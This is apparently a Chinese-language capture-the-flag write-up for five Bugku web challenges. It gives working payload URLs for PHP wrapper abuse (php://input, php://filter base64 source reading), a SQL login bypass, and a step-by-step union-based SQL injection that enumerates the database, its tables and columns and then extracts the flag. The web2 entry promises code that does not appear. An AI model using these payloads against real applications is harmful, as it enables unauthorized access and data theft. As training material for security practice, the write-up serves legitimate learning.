web1:
读图片中代码可知,c=读取b的内容,a与b相等即可得到flag
利用php伪协议,post 1 即可。
http://123.206.31.85:10001/?a=1&b=php://input
web2:
简单的计算式子,直接正则匹配,算一下就行了。
代码如下:
web3:
用burp改文件类型,绕过,得到一个页面
对op参数,php伪协议,得到flag
http://123.206.31.85:10003/?op=php://filter/read=convert.base64-encode/resource=flag&imagekey=72de19c132dbbb873ec4a9c5b9cd0d974d8ed16d
web4:
直接万能密码,单引号闭合即可。
web5:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 返回为空
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 or 1=1 # 返回正常
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2 # 回显空
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2,3 #回显空
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2,3,4 #回显正常
知道了回显位置,字段数为4,开始爆数据库
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,2,database(),4#
爆表:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27web5%27
爆字段:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,%20group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27flag%27#
得到flag:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,flag,3,4%20from%20flag#